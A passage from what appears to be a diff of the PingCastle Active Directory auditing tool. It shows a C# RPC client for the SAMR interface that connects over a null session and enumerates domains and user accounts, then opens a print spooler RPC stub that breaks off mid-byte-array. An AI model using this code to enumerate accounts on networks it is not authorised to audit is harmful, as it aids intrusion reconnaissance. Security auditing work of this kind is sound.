0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x04,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x20,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x24,0x00,0x08,0x00,
0x47,0x04,0x0a,0x07,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,0x0b,0x01,0x08,0x00,0x30,0x00,0x13,0x20,0x10,0x00,0x42,0x00,
0x70,0x00,0x18,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x06,0x00,0x30,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x48,0x00,0x40,0x00,0x45,0x06,0x0a,0x03,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,0x58,0x01,0x08,0x00,0x08,0x00,0x13,0x20,0x10,0x00,0x78,0x00,0x48,0x00,0x18,0x00,
0x08,0x00,0x50,0x21,0x20,0x00,0x08,0x00,0x70,0x00,0x28,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x07,0x00,0x28,0x00,0x30,0x40,0x00,0x00,0x00,0x00,
0x2c,0x00,0x40,0x00,0x46,0x05,0x0a,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x0b,0x01,
0x10,0x00,0x66,0x00,0x10,0x01,0x18,0x00,0xc2,0x00,0x70,0x00,0x20,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x09,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0a,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0b,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x38,0x00,0x30,0x40,0x00,0x00,
0x00,0x00,0x50,0x00,0x40,0x00,0x45,0x07,0x0a,0x03,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,0x58,0x01,0x08,0x00,0x08,0x00,
0x48,0x00,0x10,0x00,0x08,0x00,0x13,0x20,0x18,0x00,0x78,0x00,0x48,0x00,0x20,0x00,0x08,0x00,0x50,0x21,0x28,0x00,0x08,0x00,0x70,0x00,0x30,0x00,0x08,0x00,
0x00
};
private static byte[] MIDL_TypeFormatStringx86 = new byte[] {
0x00,0x00,0x12,0x08,0x05,0x5c,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,0x30,0x41,0x00,0x00,0x11,0x00,0x14,0x00,
0x1c,0x01,0x02,0x00,0x17,0x55,0x02,0x00,0x01,0x00,0x17,0x55,0x00,0x00,0x01,0x00,0x05,0x5b,0x16,0x03,0x08,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,
0x12,0x00,0xe0,0xff,0x5b,0x06,0x06,0x08,0x5c,0x5b,0x11,0x14,0x02,0x00,0x12,0x00,0x1e,0x00,0x1d,0x00,0x06,0x00,0x01,0x5b,0x15,0x00,0x06,0x00,0x4c,0x00,
0xf4,0xff,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,0x08,0x00,0xf0,0xff,0x02,0x02,0x4c,0x00,0xe0,0xff,0x5c,0x5b,
0x11,0x08,0x08,0x5c,0x11,0x14,0x02,0x00,0x12,0x00,0x4c,0x00,0x1c,0x01,0x02,0x00,0x17,0x55,0x06,0x00,0x01,0x00,0x17,0x55,0x04,0x00,0x01,0x00,0x05,0x5b,
0x16,0x03,0x0c,0x00,0x4b,0x5c,0x46,0x5c,0x08,0x00,0x08,0x00,0x12,0x00,0xe0,0xff,0x5b,0x08,0x06,0x06,0x08,0x5b,0x1b,0x03,0x0c,0x00,0x19,0x00,0x00,0x00,
0x01,0x00,0x4b,0x5c,0x48,0x49,0x0c,0x00,0x00,0x00,0x01,0x00,0x08,0x00,0x08,0x00,0x12,0x00,0xbe,0xff,0x5b,0x4c,0x00,0xcb,0xff,0x5b,0x16,0x03,0x08,0x00,
0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xd0,0xff,0x5b,0x08,0x08,0x5b,0x11,0x0c,0x08,0x5c,0x11,0x00,0x82,0xff,0x11,0x04,0x02,0x00,0x30,0xa0,
0x00,0x01,0x00
};
private static byte[] MIDL_TypeFormatStringx64 = new byte[] {
0x00,0x00,0x12,0x08,0x05,0x5c,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,0x30,0x41,0x00,0x00,0x11,0x00,0x14,0x00,
0x1c,0x01,0x02,0x00,0x17,0x55,0x02,0x00,0x01,0x00,0x17,0x55,0x00,0x00,0x01,0x00,0x05,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x08,0x00,0x06,0x06,0x40,0x36,
0x5c,0x5b,0x12,0x00,0xde,0xff,0x11,0x14,0x02,0x00,0x12,0x00,0x1e,0x00,0x1d,0x00,0x06,0x00,0x01,0x5b,0x15,0x00,0x06,0x00,0x4c,0x00,0xf4,0xff,0x5c,0x5b,
0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,0x08,0x00,0xf0,0xff,0x02,0x02,0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x11,0x08,0x08,0x5c,
0x11,0x14,0x02,0x00,0x12,0x00,0x28,0x00,0x1a,0x03,0x18,0x00,0x00,0x00,0x00,0x00,0x08,0x40,0x4c,0x00,0xa4,0xff,0x5c,0x5b,0x21,0x03,0x00,0x00,0x19,0x00,
0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x4c,0x00,0xde,0xff,0x5c,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x06,0x00,0x08,0x40,0x36,0x5b,0x12,0x00,
0xdc,0xff,0x11,0x0c,0x08,0x5c,0x11,0x00,0xaa,0xff,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x01,0x00
};
[StructLayout(LayoutKind.Sequential)]
private struct SAMPR_ENUMERATION_BUFFER
{
public UInt32 EntriesRead;
public IntPtr Buffer;
};
[StructLayout(LayoutKind.Sequential)]
private struct SAMPR_RID_ENUMERATION
{
public IntPtr RelativeId;
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr buffer;
};
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public samr()
{
Guid interfaceId = new Guid("12345778-1234-ABCD-EF00-0123456789AC");
if (IntPtr.Size == 8)
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\samr");
}
else
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\samr");
}
UseNullSession = true;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
~samr()
{
freeStub();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrConnect(string server, out IntPtr ServerHandle, UInt32 DesiredAccess)
{
IntPtr intptrServer = Marshal.StringToHGlobalUni(server);
ServerHandle = IntPtr.Zero;
IntPtr result = IntPtr.Zero;
try
{
ServerHandle = IntPtr.Zero;
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(0), intptrServer, out ServerHandle, DesiredAccess);
}
else
{
IntPtr tempValue = new IntPtr();
GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(0, intptrServer, tempValuePointer, new IntPtr((int)DesiredAccess));
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
ServerHandle = Marshal.ReadIntPtr(tempValuePointer);
}
finally
{
handle.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("SamrConnect failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
finally
{
if (intptrServer != IntPtr.Zero)
Marshal.FreeHGlobal(intptrServer);
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrCloseHandle(ref IntPtr ServerHandle)
{
IntPtr result = IntPtr.Zero;
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(56), ref ServerHandle);
}
else
{
IntPtr tempValue = ServerHandle;
GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(54, tempValuePointer);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
ServerHandle = Marshal.ReadIntPtr(tempValuePointer);
}
finally
{
handle.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("SamrCloseHandle failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrEnumerateDomainsInSamServer(IntPtr ServerHandle, ref IntPtr EnumerationContext,
out SAMR_ENUMERATION_ENTRY[] Buffer, UInt32 PreferedMaximumLength, out UInt32 CountReturned)
{
IntPtr result = IntPtr.Zero;
CountReturned = 0;
try
{
IntPtr IntptrBuffer = IntPtr.Zero;
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(246), ServerHandle, ref EnumerationContext, out IntptrBuffer, PreferedMaximumLength, out CountReturned);
}
else
{
IntPtr tempValue1 = EnumerationContext;
GCHandle handle1 = GCHandle.Alloc(tempValue1, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
IntPtr tempValue2 = IntPtr.Zero;
GCHandle handle2 = GCHandle.Alloc(tempValue2, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
IntPtr tempValue3 = IntPtr.Zero;
GCHandle handle3 = GCHandle.Alloc(tempValue3, GCHandleType.Pinned);
IntPtr tempValuePointer3 = handle3.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(234, ServerHandle, tempValuePointer1, tempValuePointer2, new IntPtr(PreferedMaximumLength), tempValuePointer3);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
EnumerationContext = Marshal.ReadIntPtr(tempValuePointer1);
IntptrBuffer = Marshal.ReadIntPtr(tempValuePointer2);
CountReturned = (UInt32)Marshal.ReadInt32(tempValuePointer3);
}
finally
{
handle1.Free();
handle2.Free();
handle3.Free();
}
}
Buffer = Unmarshal_SAMR_ENUMRATION(IntptrBuffer);
}
catch (SEHException)
{
Buffer = null;
Trace.WriteLine("SamrEnumerateDomainsInSamServer failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private SAMR_ENUMERATION_ENTRY[] Unmarshal_SAMR_ENUMRATION(IntPtr IntptrBuffer)
{
if (IntptrBuffer == IntPtr.Zero)
return null;
SAMPR_ENUMERATION_BUFFER Buffer = (SAMPR_ENUMERATION_BUFFER) Marshal.PtrToStructure(IntptrBuffer, typeof(SAMPR_ENUMERATION_BUFFER));
SAMR_ENUMERATION_ENTRY[] output = new SAMR_ENUMERATION_ENTRY[Buffer.EntriesRead];
int size = Marshal.SizeOf(typeof(SAMPR_RID_ENUMERATION));
for (int i = 0; i < (int)Buffer.EntriesRead; i++)
{
output[i] = new SAMR_ENUMERATION_ENTRY();
SAMPR_RID_ENUMERATION ridenumaration = (SAMPR_RID_ENUMERATION)Marshal.PtrToStructure(new IntPtr(Buffer.Buffer.ToInt64() + size * i), typeof(SAMPR_RID_ENUMERATION));
output[i].RelativeId = ridenumaration.RelativeId.ToInt64();
output[i].Name = Marshal.PtrToStringUni(ridenumaration.buffer, ridenumaration.Length/2);
if (ridenumaration.buffer != IntPtr.Zero && ridenumaration.MaximumLength > 0)
FreeMemory(ridenumaration.buffer);
}
if (Buffer.Buffer != IntPtr.Zero)
FreeMemory(Buffer.Buffer);
FreeMemory(IntptrBuffer);
return output;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrLookupDomainInSamServer(IntPtr ServerHandle, string Name, out SecurityIdentifier DomainId)
{
IntPtr result = IntPtr.Zero;
DomainId = null;
IntPtr sid = IntPtr.Zero;
using (var NameString = new PingCastle.NativeMethods.UNICODE_STRING())
{
try
{
NameString.Initialize(Name);
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(190), ServerHandle, NameString, out sid);
}
else
{
GCHandle handle1 = GCHandle.Alloc(NameString, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
IntPtr tempValue2 = sid;
GCHandle handle2 = GCHandle.Alloc(tempValue2, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(180, ServerHandle, tempValuePointer1, tempValuePointer2);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
sid = Marshal.ReadIntPtr(tempValuePointer2);
}
finally
{
handle1.Free();
handle2.Free();
}
}
DomainId = new SecurityIdentifier(sid);
FreeMemory(sid);
}
catch (SEHException)
{
Trace.WriteLine("SamrLookupDomainInSamServer failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrOpenDomain(IntPtr ServerHandle, Int32 DesiredAccess, SecurityIdentifier DomainId, out IntPtr DomainHandle)
{
IntPtr result = IntPtr.Zero;
DomainHandle = IntPtr.Zero;
try
{
byte[] sid = new byte[DomainId.BinaryLength];
DomainId.GetBinaryForm(sid, 0);
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(314), ServerHandle, DesiredAccess, sid, out DomainHandle);
}
else
{
GCHandle handle1 = GCHandle.Alloc(sid, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
IntPtr tempValue2 = IntPtr.Zero;
GCHandle handle2 = GCHandle.Alloc(tempValue2, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(300, ServerHandle, new IntPtr(DesiredAccess), tempValuePointer1, tempValuePointer2);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
DomainHandle = Marshal.ReadIntPtr(tempValuePointer2);
}
finally
{
handle1.Free();
handle2.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("SamrOpenDomain failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 SamrEnumerateUsersInDomain(IntPtr DomainHandle, ref IntPtr EnumerationContext, Int32 UserAccountControl,
out SAMR_ENUMERATION_ENTRY[] Buffer, Int32 PreferedMaximumLength, out UInt32 CountReturned)
{
IntPtr result = IntPtr.Zero;
CountReturned = 0;
try
{
IntPtr IntptrBuffer = IntPtr.Zero;
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(526), DomainHandle, ref EnumerationContext, UserAccountControl, out IntptrBuffer, PreferedMaximumLength, ref CountReturned);
}
else
{
IntPtr tempValue1 = EnumerationContext;
GCHandle handle1 = GCHandle.Alloc(tempValue1, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
IntPtr tempValue2 = IntPtr.Zero;
GCHandle handle2 = GCHandle.Alloc(tempValue2, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
IntPtr tempValue3 = IntPtr.Zero;
GCHandle handle3 = GCHandle.Alloc(tempValue3, GCHandleType.Pinned);
IntPtr tempValuePointer3 = handle3.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(500, DomainHandle, tempValuePointer1, new IntPtr(UserAccountControl), tempValuePointer2, new IntPtr(PreferedMaximumLength), tempValuePointer3);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
EnumerationContext = Marshal.ReadIntPtr(tempValuePointer1);
IntptrBuffer = Marshal.ReadIntPtr(tempValuePointer2);
CountReturned = (UInt32)Marshal.ReadInt32(tempValuePointer3);
}
finally
{
handle1.Free();
handle2.Free();
handle3.Free();
}
}
Buffer = Unmarshal_SAMR_ENUMRATION(IntptrBuffer);
}
catch (SEHException)
{
Buffer = null;
Trace.WriteLine("SamrEnumerateUsersInDomain failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
}
}

372
RPC/spool.cs Normal file
View File

@ -0,0 +1,372 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Text;
namespace PingCastle.RPC
{
public class rprn : rpcapi
{
private static byte[] MIDL_ProcFormatStringx86 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,
0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x01,0x00,0x18,0x00,0x31,0x04,0x00,0x00,0x00,0x5c,0x08,0x00,0x40,0x00,0x46,0x06,0x08,0x05,
0x00,0x00,0x01,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x02,0x00,0x10,0x01,0x04,0x00,0x0a,0x00,0x0b,0x00,0x08,0x00,0x02,0x00,0x0b,0x01,0x0c,0x00,0x1e,
0x00,0x48,0x00,0x10,0x00,0x08,0x00,0x70,0x00,0x14,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x03,0x00,0x08,0x00,0x32,
0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x04,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,
0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,
0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x06,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x07,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,
0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,
0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x09,0x00,0x08,0x00,
0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,
0x00,0x0a,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x0b,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,
0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,
0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0e,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0f,0x00,0x08,
0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x10,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x11,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x12,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x13,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,
0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x14,0x00,0x08,0x00,0x32,0x00,0x00,
0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x15,0x00,
0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,
0x00,0x00,0x00,0x16,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x17,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x18,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x19,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,
0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1a,0x00,0x08,0x00,0x32,0x00,
0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1b,
0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,
0x00,0x00,0x00,0x00,0x1c,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,
0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1d,0x00,0x08,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x18,0x01,0x00,0x00,0x36,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1e,0x00,0x08,0x00,0x32,0x00,0x00,
0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1f,0x00,
0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,
0x00,0x00,0x00,0x20,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x21,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x22,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x23,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,
0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x24,0x00,0x08,0x00,0x32,0x00,
0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x25,
